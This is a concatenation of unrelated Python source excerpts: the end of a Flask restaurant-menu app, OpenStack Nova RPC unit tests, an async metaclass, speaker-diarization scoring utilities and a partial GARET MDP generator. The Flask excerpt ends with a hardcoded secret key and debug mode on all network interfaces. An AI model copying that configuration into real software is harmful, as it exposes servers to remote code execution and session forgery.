return render_template(
'editmenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=editedItem)
@app.route('/restaurants/<int:restaurant_id>/<int:menu_id>/delete', methods=['GET', 'POST'])
def delete_Menu_Item(restaurant_id, menu_id):
deletedItem = session.query(MenuItem).filter_by(id=menu_id).one()
if request.method == 'POST':
session.delete(deletedItem)
session.commit()
flash("menu item deleted!")
return redirect(url_for('restaurantMenu', restaurant_id=restaurant_id))
else:
return render_template(
'deletemenuitem.html', restaurant_id=restaurant_id, menu_id=menu_id, item=deletedItem)
return "delete successful"
if __name__ == '__main__':
app.secret_key = "secret_key"
app.debug = True
app.run(host='0.0.0.0', port=5000)
|
# Copyright 2016 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import oslo_messaging as messaging
from oslo_messaging.rpc import dispatcher
from oslo_serialization import jsonutils
import nova.conf
from nova import context
from nova import rpc
from nova import test
CONF = nova.conf.CONF
class TestRPC(test.NoDBTestCase):
# We're testing the rpc code so we can't use the RPCFixture.
STUB_RPC = False
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT')
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
@mock.patch.object(rpc, 'NOTIFIER')
@mock.patch.object(rpc, 'get_allowed_exmods')
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'get_notification_transport')
@mock.patch.object(messaging, 'Notifier')
def _test_init(self, notification_format, expected_driver_topic_kwargs,
mock_notif, mock_noti_trans, mock_ser, mock_exmods,
mock_NOTIFIER, mock_LEGACY_NOTIFIER, mock_NOTIFICATION_TRANSPORT,
mock_TRANSPORT,
versioned_notifications_topics=None):
if not versioned_notifications_topics:
versioned_notifications_topics = ['versioned_notifications']
self.flags(
notification_format=notification_format,
versioned_notifications_topics=versioned_notifications_topics,
group='notifications')
legacy_notifier = mock.Mock()
notifier = mock.Mock()
notif_transport = mock.Mock()
transport = mock.Mock()
serializer = mock.Mock()
mock_exmods.return_value = ['foo']
mock_noti_trans.return_value = notif_transport
mock_ser.return_value = serializer
mock_notif.side_effect = [legacy_notifier, notifier]
with mock.patch.object(rpc, 'create_transport') as create_transport, \
mock.patch.object(rpc, 'get_transport_url') as get_url:
create_transport.return_value = transport
rpc.init(CONF)
create_transport.assert_called_once_with(get_url.return_value)
self.assertTrue(mock_exmods.called)
self.assertIsNotNone(mock_TRANSPORT)
self.assertIsNotNone(mock_LEGACY_NOTIFIER)
self.assertIsNotNone(mock_NOTIFIER)
self.assertEqual(legacy_notifier, rpc.LEGACY_NOTIFIER)
self.assertEqual(notifier, rpc.NOTIFIER)
expected_calls = []
for kwargs in expected_driver_topic_kwargs:
expected_kwargs = {'serializer': serializer}
expected_kwargs.update(kwargs)
expected_calls.append(((notif_transport,), expected_kwargs))
self.assertEqual(expected_calls, mock_notif.call_args_list,
"The calls to messaging.Notifier() did not create "
"the legacy and versioned notifiers properly.")
def test_init_unversioned(self):
# The expected call to get the legacy notifier will require no new
# kwargs, and we expect the new notifier will need the noop driver
expected_driver_topic_kwargs = [{}, {'driver': 'noop'}]
self._test_init('unversioned', expected_driver_topic_kwargs)
def test_init_both(self):
expected_driver_topic_kwargs = [
{},
{'topics': ['versioned_notifications']}]
self._test_init('both', expected_driver_topic_kwargs)
def test_init_versioned(self):
expected_driver_topic_kwargs = [
{'driver': 'noop'},
{'topics': ['versioned_notifications']}]
self._test_init('versioned', expected_driver_topic_kwargs)
def test_init_versioned_with_custom_topics(self):
expected_driver_topic_kwargs = [
{'driver': 'noop'},
{'topics': ['custom_topic1', 'custom_topic2']}]
versioned_notifications_topics = ['custom_topic1', 'custom_topic2']
self._test_init('versioned', expected_driver_topic_kwargs,
versioned_notifications_topics=versioned_notifications_topics)
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_transport_null(self):
"""Ensure cleanup fails if 'rpc.TRANSPORT' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_notification_transport_null(self):
"""Ensure cleanup fails if 'rpc.NOTIFICATION_TRANSPORT' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFIER', new=mock.Mock())
def test_cleanup_legacy_notifier_null(self):
"""Ensure cleanup fails if 'rpc.LEGACY_NOTIFIER' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT', new=mock.Mock())
@mock.patch.object(rpc, 'LEGACY_NOTIFIER', new=mock.Mock())
def test_cleanup_notifier_null(self):
"""Ensure cleanup fails if 'rpc.NOTIFIER' wasn't set."""
self.assertRaises(AssertionError, rpc.cleanup)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'NOTIFICATION_TRANSPORT')
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
@mock.patch.object(rpc, 'NOTIFIER')
def test_cleanup(self, mock_NOTIFIER, mock_LEGACY_NOTIFIER,
mock_NOTIFICATION_TRANSPORT, mock_TRANSPORT):
rpc.cleanup()
mock_TRANSPORT.cleanup.assert_called_once_with()
mock_NOTIFICATION_TRANSPORT.cleanup.assert_called_once_with()
self.assertIsNone(rpc.TRANSPORT)
self.assertIsNone(rpc.NOTIFICATION_TRANSPORT)
self.assertIsNone(rpc.LEGACY_NOTIFIER)
self.assertIsNone(rpc.NOTIFIER)
@mock.patch.object(messaging, 'set_transport_defaults')
def test_set_defaults(self, mock_set):
control_exchange = mock.Mock()
rpc.set_defaults(control_exchange)
mock_set.assert_called_once_with(control_exchange)
def test_add_extra_exmods(self):
extra_exmods = []
with mock.patch.object(
rpc, 'EXTRA_EXMODS', extra_exmods) as mock_EXTRA_EXMODS:
rpc.add_extra_exmods('foo', 'bar')
self.assertEqual(['foo', 'bar'], mock_EXTRA_EXMODS)
def test_clear_extra_exmods(self):
extra_exmods = ['foo', 'bar']
with mock.patch.object(
rpc, 'EXTRA_EXMODS', extra_exmods) as mock_EXTRA_EXMODS:
rpc.clear_extra_exmods()
self.assertEqual([], mock_EXTRA_EXMODS)
def test_get_allowed_exmods(self):
allowed_exmods = ['foo']
extra_exmods = ['bar']
with test.nested(
mock.patch.object(rpc, 'EXTRA_EXMODS', extra_exmods),
mock.patch.object(rpc, 'ALLOWED_EXMODS', allowed_exmods)
) as (mock_EXTRA_EXMODS, mock_ALLOWED_EXMODS):
exmods = rpc.get_allowed_exmods()
self.assertEqual(['foo', 'bar'], exmods)
@mock.patch.object(messaging, 'TransportURL')
def test_get_transport_url(self, mock_url):
mock_url.parse.return_value = 'foo'
url = rpc.get_transport_url(url_str='bar')
self.assertEqual('foo', url)
mock_url.parse.assert_called_once_with(rpc.CONF, 'bar')
@mock.patch.object(messaging, 'TransportURL')
def test_get_transport_url_null(self, mock_url):
mock_url.parse.return_value = 'foo'
url = rpc.get_transport_url()
self.assertEqual('foo', url)
mock_url.parse.assert_called_once_with(rpc.CONF, None)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', None)
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'RPCClient')
def test_get_client(self, mock_client, mock_ser, mock_TRANSPORT):
tgt = mock.Mock()
ser = mock.Mock()
mock_client.return_value = 'client'
mock_ser.return_value = ser
client = rpc.get_client(tgt, version_cap='1.0', serializer='foo')
mock_ser.assert_called_once_with('foo')
mock_client.assert_called_once_with(mock_TRANSPORT,
tgt, version_cap='1.0',
call_monitor_timeout=None,
serializer=ser)
self.assertEqual('client', client)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', None)
@mock.patch.object(rpc, 'RequestContextSerializer')
@mock.patch.object(messaging, 'get_rpc_server')
def test_get_server(self, mock_get, mock_ser, mock_TRANSPORT):
ser = mock.Mock()
tgt = mock.Mock()
ends = mock.Mock()
mock_ser.return_value = ser
mock_get.return_value = 'server'
server = rpc.get_server(tgt, ends, serializer='foo')
mock_ser.assert_called_once_with('foo')
access_policy = dispatcher.DefaultRPCAccessPolicy
mock_get.assert_called_once_with(mock_TRANSPORT, tgt, ends,
executor='eventlet', serializer=ser,
access_policy=access_policy)
self.assertEqual('server', server)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', mock.Mock())
@mock.patch.object(rpc, 'ProfilerRequestContextSerializer')
@mock.patch.object(messaging, 'RPCClient')
def test_get_client_profiler_enabled(self, mock_client, mock_ser,
mock_TRANSPORT):
tgt = mock.Mock()
ser = mock.Mock()
mock_client.return_value = 'client'
mock_ser.return_value = ser
client = rpc.get_client(tgt, version_cap='1.0', serializer='foo')
mock_ser.assert_called_once_with('foo')
mock_client.assert_called_once_with(mock_TRANSPORT,
tgt, version_cap='1.0',
call_monitor_timeout=None,
serializer=ser)
self.assertEqual('client', client)
@mock.patch.object(rpc, 'TRANSPORT')
@mock.patch.object(rpc, 'profiler', mock.Mock())
@mock.patch.object(rpc, 'profiler', mock.Mock())
@mock.patch.object(rpc, 'ProfilerRequestContextSerializer')
@mock.patch.object(messaging, 'get_rpc_server')
def test_get_server_profiler_enabled(self, mock_get, mock_ser,
mock_TRANSPORT):
ser = mock.Mock()
tgt = mock.Mock()
ends = mock.Mock()
mock_ser.return_value = ser
mock_get.return_value = 'server'
server = rpc.get_server(tgt, ends, serializer='foo')
mock_ser.assert_called_once_with('foo')
access_policy = dispatcher.DefaultRPCAccessPolicy
mock_get.assert_called_once_with(mock_TRANSPORT, tgt, ends,
executor='eventlet', serializer=ser,
access_policy=access_policy)
self.assertEqual('server', server)
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
def test_get_notifier(self, mock_LEGACY_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_LEGACY_NOTIFIER.prepare = mock_prep
notifier = rpc.get_notifier('service', publisher_id='foo')
mock_prep.assert_called_once_with(publisher_id='foo')
self.assertIsInstance(notifier, rpc.LegacyValidatingNotifier)
self.assertEqual('notifier', notifier.notifier)
@mock.patch.object(rpc, 'LEGACY_NOTIFIER')
def test_get_notifier_null_publisher(self, mock_LEGACY_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_LEGACY_NOTIFIER.prepare = mock_prep
notifier = rpc.get_notifier('service', host='bar')
mock_prep.assert_called_once_with(publisher_id='service.bar')
self.assertIsInstance(notifier, rpc.LegacyValidatingNotifier)
self.assertEqual('notifier', notifier.notifier)
@mock.patch.object(rpc, 'NOTIFIER')
def test_get_versioned_notifier(self, mock_NOTIFIER):
mock_prep = mock.Mock()
mock_prep.return_value = 'notifier'
mock_NOTIFIER.prepare = mock_prep
notifier = rpc.get_versioned_notifier('service.foo')
mock_prep.assert_called_once_with(publisher_id='service.foo')
self.assertEqual('notifier', notifier)
@mock.patch.object(rpc, 'get_allowed_exmods')
@mock.patch.object(messaging, 'get_rpc_transport')
def test_create_transport(self, mock_transport, mock_exmods):
exmods = mock_exmods.return_value
transport = rpc.create_transport(mock.sentinel.url)
self.assertEqual(mock_transport.return_value, transport)
mock_exmods.assert_called_once_with()
mock_transport.assert_called_once_with(rpc.CONF,
url=mock.sentinel.url,
allowed_remote_exmods=exmods)
class TestJsonPayloadSerializer(test.NoDBTestCase):
def test_serialize_entity(self):
serializer = rpc.JsonPayloadSerializer()
with mock.patch.object(jsonutils, 'to_primitive') as mock_prim:
serializer.serialize_entity('context', 'entity')
mock_prim.assert_called_once_with('entity', convert_instances=True,
fallback=serializer.fallback)
def test_fallback(self):
# Convert RequestContext, should get a dict.
primitive = rpc.JsonPayloadSerializer.fallback(context.get_context())
self.assertIsInstance(primitive, dict)
# Convert anything else, should get a string.
primitive = rpc.JsonPayloadSerializer.fallback(mock.sentinel.entity)
self.assertIsInstance(primitive, str)
class TestRequestContextSerializer(test.NoDBTestCase):
def setUp(self):
super(TestRequestContextSerializer, self).setUp()
self.mock_base = mock.Mock()
self.ser = rpc.RequestContextSerializer(self.mock_base)
self.ser_null = rpc.RequestContextSerializer(None)
def test_serialize_entity(self):
self.mock_base.serialize_entity.return_value = 'foo'
ser_ent = self.ser.serialize_entity('context', 'entity')
self.mock_base.serialize_entity.assert_called_once_with('context',
'entity')
self.assertEqual('foo', ser_ent)
def test_serialize_entity_null_base(self):
ser_ent = self.ser_null.serialize_entity('context', 'entity')
self.assertEqual('entity', ser_ent)
def test_deserialize_entity(self):
self.mock_base.deserialize_entity.return_value = 'foo'
deser_ent = self.ser.deserialize_entity('context', 'entity')
self.mock_base.deserialize_entity.assert_called_once_with('context',
'entity')
self.assertEqual('foo', deser_ent)
def test_deserialize_entity_null_base(self):
deser_ent = self.ser_null.deserialize_entity('context', 'entity')
self.assertEqual('entity', deser_ent)
def test_serialize_context(self):
context = mock.Mock()
self.ser.serialize_context(context)
context.to_dict.assert_called_once_with()
@mock.patch.object(context, 'RequestContext')
def test_deserialize_context(self, mock_req):
self.ser.deserialize_context('context')
mock_req.from_dict.assert_called_once_with('context')
class TestProfilerRequestContextSerializer(test.NoDBTestCase):
def setUp(self):
super(TestProfilerRequestContextSerializer, self).setUp()
self.ser = rpc.ProfilerRequestContextSerializer(mock.Mock())
@mock.patch('nova.rpc.profiler')
def test_serialize_context(self, mock_profiler):
prof = mock_profiler.get.return_value
prof.hmac_key = 'swordfish'
prof.get_base_id.return_value = 'baseid'
prof.get_id.return_value = 'parentid'
context = mock.Mock()
context.to_dict.return_value = {'project_id': 'test'}
self.assertEqual({'project_id': 'test',
'trace_info': {
'hmac_key': 'swordfish',
'base_id': 'baseid',
'parent_id': 'parentid'}},
self.ser.serialize_context(context))
@mock.patch('nova.rpc.profiler')
def test_deserialize_context(self, mock_profiler):
serialized = {'project_id': 'test',
'trace_info': {
'hmac_key': 'swordfish',
'base_id': 'baseid',
'parent_id': 'parentid'}}
context = self.ser.deserialize_context(serialized)
self.assertEqual('test', context.project_id)
mock_profiler.init.assert_called_once_with(
hmac_key='swordfish', base_id='baseid', parent_id='parentid')
class TestClientRouter(test.NoDBTestCase):
@mock.patch('oslo_messaging.RPCClient')
def test_by_instance(self, mock_rpcclient):
default_client = mock.Mock()
cell_client = mock.Mock()
mock_rpcclient.return_value = cell_client
ctxt = mock.Mock()
ctxt.mq_connection = mock.sentinel.transport
router = rpc.ClientRouter(default_client)
client = router.client(ctxt)
# verify a client was created by ClientRouter
mock_rpcclient.assert_called_once_with(
mock.sentinel.transport, default_client.target,
version_cap=default_client.version_cap,
call_monitor_timeout=default_client.call_monitor_timeout,
serializer=default_client.serializer)
# verify cell client was returned
self.assertEqual(cell_client, client)
@mock.patch('oslo_messaging.RPCClient')
def test_by_instance_untargeted(self, mock_rpcclient):
default_client = mock.Mock()
cell_client = mock.Mock()
mock_rpcclient.return_value = cell_client
ctxt = mock.Mock()
ctxt.mq_connection = None
router = rpc.ClientRouter(default_client)
client = router.client(ctxt)
self.assertEqual(router.default_client, client)
self.assertFalse(mock_rpcclient.called)
class TestIsNotificationsEnabledDecorator(test.NoDBTestCase):
def setUp(self):
super(TestIsNotificationsEnabledDecorator, self).setUp()
self.f = mock.Mock()
self.f.__name__ = 'f'
self.decorated = rpc.if_notifications_enabled(self.f)
def test_call_func_if_needed(self):
self.decorated()
self.f.assert_called_once_with()
@mock.patch('nova.rpc.NOTIFIER.is_enabled', return_value=False)
def test_not_call_func_if_notifier_disabled(self, mock_is_enabled):
self.decorated()
self.assertEqual(0, len(self.f.mock_calls))
def test_not_call_func_if_only_unversioned_notifications_requested(self):
self.flags(notification_format='unversioned', group='notifications')
self.decorated()
self.assertEqual(0, len(self.f.mock_calls))
|
"""Work derived from curio written by David Beazley.
Reference:
https://github.com/dabeaz/curio/blob/3d610aea866178800b1e5dbf5cfef8210418fb58/curio/meta.py
Removed in:
https://github.com/dabeaz/curio/commit/66c60fec61610ae386bc03717724e6438948a419
See original licenses in:
https://github.com/dabeaz/curio/blob/3d610aea866178800b1e5dbf5cfef8210418fb58/LICENSE
"""
# Internal
import typing as T
import inspect
# Project
from .async_abc import AsyncABCMeta
# Generic types
K = T.TypeVar("K")
class AsyncObjectMeta(AsyncABCMeta):
"""
Metaclass that allows for asynchronous instance initialization and the
__init__() method to be defined as a coroutine. Usage:
class Spam(metaclass=AsyncInstanceType):
async def __init__(self, x, y):
self.x = x
self.y = y
async def main():
s = await Spam(2, 3)
...
"""
@staticmethod
def __new__(
mcs: T.Type["AsyncObjectMeta"],
name: str,
bases: T.Tuple[type, ...],
namespace: T.Dict[str, T.Any],
) -> "AsyncObjectMeta":
if "__init__" in namespace and not inspect.iscoroutinefunction(namespace["__init__"]):
raise TypeError("__init__ must be a coroutine")
return super().__new__(mcs, name, bases, namespace) # type: ignore
async def __call__(cls: T.Type[K], *args: T.Any, **kwargs: T.Any) -> K:
self: K = cls.__new__(cls, *args, **kwargs) # type: ignore
await self.__init__(*args, **kwargs) # type: ignore
return self
class AsyncObject(metaclass=AsyncObjectMeta):
pass
__all__ = ("AsyncObjectMeta", "AsyncObject")
|
#!/usr/bin/env python
# Copyright 2013-2019 Lukas Burget, Mireia Diez (burget@fit.vutbr.cz, mireia@fit.vutbr.cz)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import scipy.linalg as spl
import errno, os
from scipy.special import softmax
def twoGMMcalib_lin(s, niters=20):
"""
Train two-Gaussian GMM with shared variance for calibration of scores 's'
Returns threshold for original scores 's' that "separates" the two gaussians
and array of linearly callibrated log odds ratio scores.
"""
weights = np.array([0.5, 0.5])
means = np.mean(s) + np.std(s) * np.array([-1, 1])
var = np.var(s)
threshold = np.inf
for _ in range(niters):
lls = np.log(weights)-0.5*np.log(var) - 0.5*(s[:,np.newaxis]-means)**2/var
gammas = softmax(lls, axis=1)
cnts = np.sum(gammas, axis=0)
weights = cnts / cnts.sum()
means = s.dot(gammas) / cnts
var = ((s**2).dot(gammas) / cnts - means**2).dot(weights)
threshold = -0.5*(np.log(weights**2/var)-means**2/var).dot([1,-1])/(means/var).dot([1,-1])
return threshold, lls[:,means.argmax()]-lls[:,means.argmin()]
def AHC(sim_mx, threshold=0):
""" Performs UPGMA variant (wikipedia.org/wiki/UPGMA) of Agglomerative
Hierarchical Clustering using the input pairwise similarity matrix.
Input:
sim_mx - NxN pairwise similarity matrix
threshold - threshold for stopping the clustering algorithm
(see function twoGMMcalib_lin for its estimation)
Output:
cluster labels stored in an array of length N containing (integers in
the range from 0 to C-1, where C is the number of dicovered clusters)
"""
dist = -sim_mx;
dist[np.diag_indices_from(dist)] = np.inf
clsts = [[i] for i in range(len(dist))]
while True:
mi, mj = np.sort(np.unravel_index(dist.argmin(), dist.shape))
if dist[mi, mj] > -threshold:
break
dist[:, mi] = dist[mi,:] = (dist[mi,:]*len(clsts[mi])+dist[mj,:]*len(clsts[mj]))/(len(clsts[mi])+len(clsts[mj]))
dist[:, mj] = dist[mj,:] = np.inf
clsts[mi].extend(clsts[mj])
clsts[mj] = None
labs= np.empty(len(dist), dtype=int)
for i, c in enumerate([e for e in clsts if e]):
labs[c] = i
return labs
def PLDA_scoring_in_LDA_space(Fe, Ft, diagAC):
""" Produces matrix of pairwise log likelihood ratio scores evaluated using
PLDA model for enrollment (i-/x-)vectors Fe and test vectors Ft, which are
mean normalized (or centered) and transformed by LDA-transformation
(i.e. within-class covariance matrix is identity and across-class covariance
matrix is diagonal).
Input:
Fe - NxD matrix of enrollment vectors (in rows)
Ft - MxD matrix of test vectors (in rows)
diagAC - D-dimensional diagonal of across class covariance matrix
Output:
out - NxM matrix of log likelihood ratio scores
"""
# See (7-8) in L. Burget et al.: "Discriminatively trained probabilistic
# linear discriminant analysis for speaker verification", in ICASSP 2011.
iTC = 1.0 / (1 + diagAC)
iWC2AC = 1.0 / (1 + 2*diagAC)
ldTC = np.sum(np.log(1 + diagAC))
ldWC2AC = np.sum(np.log(1 + 2*diagAC))
Gamma = -0.25*(iWC2AC + 1 - 2*iTC)
Lambda= -0.5 *(iWC2AC - 1)
k = - 0.5*(ldWC2AC - 2*ldTC)
return np.dot(Fe * Lambda, Ft.T) + (Fe**2).dot(Gamma)[:,np.newaxis] + (Ft**2).dot(Gamma) + k
def kaldi_ivector_plda_scoring_dense(kaldi_plda, x, target_energy=0.1, pca_dim=None):
""" Given input array of N x-vectors and pretrained PLDA model, this function
calculates NxN matrix of pairwise similarity scores for the following AHC
clustering. This function produces exactly the same similarity scores as the
standard kaldi diarization recipe.
Input:
kaldi_plda - PLDA model using the kaldi parametrization (mu, tr, psi)
as loaded by 'read_plda' function.
x - matrix of x-vectors (NxR)
target_energy - Before calculating the similarity matrix, PCA is estimated
on the input x-vextors. The x-vectors (and PLDA model) are
then projected into low-dimensional space preservin at
least 'target_energy' variability in the x-vectors.
pca_dim - This parameter overwrites 'target_energy' and directly
specifies the PCA target dimensionality.
Output:
matrix of pairwise similarities between the input x-vectors
"""
plda_mu, plda_tr, plda_psi = kaldi_plda
[energy,PCA]=spl.eigh(np.cov(x.T, bias=True))
if pca_dim is None:
energy=np.cumsum(energy[::-1])
pca_dim=np.sum(energy/energy[-1]<=target_energy) + 2
# we need at least 2 dimensions, so 2 more dimensions are always added
PCA=PCA[:,:-pca_dim-1:-1]
print("pca_dim:", pca_dim)
plda_tr_inv_pca=PCA.T.dot(np.linalg.inv(plda_tr))
W = plda_tr_inv_pca.dot(plda_tr_inv_pca.T)
B = (plda_tr_inv_pca*plda_psi).dot(plda_tr_inv_pca.T)
acvar, wccn = spl.eigh(B, W)
x = np.dot(x-plda_mu,PCA).dot(wccn)
x *= np.sqrt(x.shape[1] / np.dot(x**2, 1.0 / (acvar + 1.0)))[:,np.newaxis] # kaldi style length-norm
#Lambda, Gamma, c, k = PLDA_params_to_bilinear_form(np.eye(pca_dim), np.diag(acvar), np.zeros((pca_dim,)))
#return bilinear_scoring(Lambda, Gamma, c, k, x, x)
return PLDA_scoring_in_LDA_space(x, x, acvar)
def read_xvector_timing_dict(kaldi_segments):
""" Loads kaldi 'segments' file with the timing information for individual x-vectors.
Each line of the 'segments' file is expected to contain the following fields:
- x-vector name (which needs to much the names of x-vectors loaded from kaldi archive)
- file name of the recording from which the xvector is extracted
- start time
- end time
Input:
kaldi_segments - path (including file name) to the Kaldi 'segments' file
Outputs:
segs_dict[recording_file_name] = (array_of_xvector_names, array_of_start_and_end_times)
"""
segs = np.loadtxt(kaldi_segments, dtype=object)
split_by_filename = np.nonzero(segs[1:,1]!=segs[:-1,1])[0]+1
return {s[0,1]: (s[:,0], s[:,2:].astype(float)) for s in np.split(segs, split_by_filename)}
def merge_adjacent_labels(starts, ends, labels):
""" Labeled segments defined as start and end times are compacted in such a way that
adjacent or overlapping segments with the same label are merged. Overlapping
segments with different labels are further adjusted not to overlap (the boundary
is set in the middle of the original overlap).
Input:
starts - array of segment start times in seconds
ends - array of segment end times in seconds
labels - array of segment labels (of any type)
Outputs:
starts, ends, labels - compacted and ajusted version of the input arrays
"""
# Merge neighbouring (or overlaping) segments with the same label
adjacent_or_overlap = np.logical_or(np.isclose(ends[:-1], starts[1:]), ends[:-1] > starts[1:])
to_split = np.nonzero(np.logical_or(~adjacent_or_overlap, labels[1:] != labels[:-1]))[0]
starts = starts[np.r_[0, to_split+1]]
ends = ends[np.r_[to_split, -1]]
labels = labels[np.r_[0, to_split+1]]
# Fix starts and ends times for overlapping segments
overlaping = np.nonzero(starts[1:]<ends[:-1])[0]
ends[overlaping] = starts[overlaping+1] = (ends[overlaping]+starts[overlaping+1]) / 2.0
return starts, ends, labels
def segment_to_frame_labels(starts, ends, labels, length=0, frame_rate=100., empty_label=None):
""" Obtain frame-by-frame labels from labeled segments defined by start and end times
Input:
starts - array of segment start times in seconds
ends - array of segment end times in seconds
labels - array of segment labels (of any type)
length: Output array is truncted or augmented (with 'empty_label' values) to have this length.
For negative 'length', it will be only augmented if shorter than '-length'.
By default (length=0), the last element of 'ends' array determine the lenght of the output.
frame_rate: frame rate of the output array (in frames per second)
Outputs:
frms - array of frame-by-frame labels
"""
min_len, max_len = (length, length) if length > 0 else (-length, None)
starts = np.rint(frame_rate*starts).astype(int)
ends = np.rint(frame_rate*ends ).astype(int)
if not ends.size:
return np.full(min_len, empty_label)
frms = np.repeat(np.r_[np.c_[[empty_label]*len(labels), labels ].flat, empty_label],
np.r_[np.c_[starts - np.r_[0, ends[:-1]], ends-starts].flat, max(0, min_len-ends[-1])])
return frms[:max_len]
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
def l2_norm(vec_or_matrix):
""" L2 normalization of vector array.
Args:
vec_or_matrix (np.array): one vector or array of vectors
Returns:
np.array: normalized vector or array of normalized vectors
"""
if len(vec_or_matrix.shape) == 1:
# linear vector
return vec_or_matrix / np.linalg.norm(vec_or_matrix)
elif len(vec_or_matrix.shape) == 2:
return vec_or_matrix / np.linalg.norm(vec_or_matrix, axis=1, ord=2)[:, np.newaxis]
else:
raise ValueError('Wrong number of dimensions, 1 or 2 is supported, not %i.' % len(vec_or_matrix.shape))
def cos_similarity(x):
"""Compute cosine similarity matrix in CPU & memory sensitive way
Args:
x (np.ndarray): embeddings, 2D array, embeddings are in rows
Returns:
np.ndarray: cosine similarity matrix
"""
assert x.ndim == 2, f'x has {x.ndim} dimensions, it must be matrix'
x = x / (np.sqrt(np.sum(np.square(x), axis=1, keepdims=True)) + 1.0e-32)
assert np.allclose(np.ones_like(x[:, 0]), np.sum(np.square(x), axis=1))
max_n_elm = 200000000
step = max(max_n_elm // (x.shape[0] * x.shape[0]), 1)
retval = np.zeros(shape=(x.shape[0], x.shape[0]), dtype=np.float64)
x0 = np.expand_dims(x, 0)
x1 = np.expand_dims(x, 1)
for i in range(0, x.shape[1], step):
product = x0[:, :, i:i+step] * x1[:, :, i:i+step]
retval += np.sum(product, axis=2, keepdims=False)
assert np.all(retval >= -1.0001), retval
assert np.all(retval <= 1.0001), retval
return retval
|
"""GARET is Generic Average Reward Environment Testbed.
It is a special case of Bhatnagar et al.'s GARNET:
https://era.library.ualberta.ca/items/8fc4a1f6-95c9-4da8-aecd-96867babdf4c
The current implementation does not support online, sample-based operation.
Instead, it is appropriate for value/policy iteration algorithm research.
"""
import functools
import jax
import jax.numpy as jnp
import numpy as np
from differential_value_iteration.environments import structure
def create(seed: int, num_states: int, num_actions: int,
branching_factor: int, dtype: np.dtype) -> structure.MarkovDecisionProcess:
"""Creates transition and reward matrices for GARET instance."""
rng_key = jax.random.PRNGKey(seed=seed)
garet_final_shape = (num_states, num_actions, num_states)
# Keys for branching_factor next state transitions for all (s, a) pairs.
new_keys = jax.random.split(rng_key, num_states * num_actions + 1)
new_state_keys = new_keys[1:]
rng_key = new_keys[0]
# For each (s,a) pair, determine next states using jax.random.choice.
# Use jax.vmap to calculate this in parallel for all (s,a) pairs.
next_state_fn = jax.vmap(jax.random.choice, in_axes=(0, None, None, None))
# Array of the indices of resulting states.
next_states_flat = next_state_fn(new_state_keys, num_states,
(branching_factor,), False)
# Generate transition probabilities for all branches.
rng_key, next_state_probs_key = jax.random.split(rng_key)
# Initial probabilities shape (|S| x |A|, b). Probabilities NOT normalized.
next_state_probs_flat_unnormalized = jax.random.uniform(
key=next_state_probs_key,
shape=(num_states * num_actions, branching_factor))
# Calculate sums per (s, a) and reshape conveniently for normalizing.
next_state_prob_sums = jnp.sum(next_state_probs_flat_unnormalized, axis=-1)
next_state_prob_sums = jnp.repeat(next_state_prob_sums, branching_factor)
next_state_prob_sums = next_state_prob_sums.reshape((-1, branching_factor))
# Normalize transition probabilities.
next_state_probs_flat = next_state_probs_flat_unnormalized / next_state_prob_sums
# Generate expected rewards for all branches.
rng_key, transition_reward_key = jax.random.split(rng_key)
transition_expected_rewards_flat = jax.random.normal(
key=transition_reward_key,
shape=(num_states * num_actions, branching_factor))
# Create the transition and reward matrices.
transition_matrix_flat = jnp.zeros(
shape=(num_states * num_actions, num_states),
dtype=jnp.float32)
reward_matrix_flat = jnp.zeros(
shape=(num_states * num_actions, num_states),
dtype=jnp.float32)
first_dim_indices = jnp.arange(num_states * num_actions)
first_dim_indices = first_dim_indices.repeat(branching_factor)
transition_matrix_flat = transition_matrix_flat.at[
first_dim_indices, next_states_flat.ravel()].set(
next_state_probs_flat.ravel())
reward_matrix_flat = reward_matrix_flat.at[
first_dim_indices, next_states_flat.ravel()].set(
transition_expected_rewards_flat.ravel())
transition_matrix = transition_matrix_flat.reshape(garet_final_shape)
reward_matrix = reward_matrix_flat.reshape(garet_final_shape)
# Marginalize rewards matrix for structure.MarkovDecisionProcess.
reward_matrix_marginalized = jax.vmap(jax.vmap(jnp.dot))(transition_matrix,
reward_matrix)
# Restructure for structure.MarkovDecisionProcess (A, S, S') vs (S, A, S').
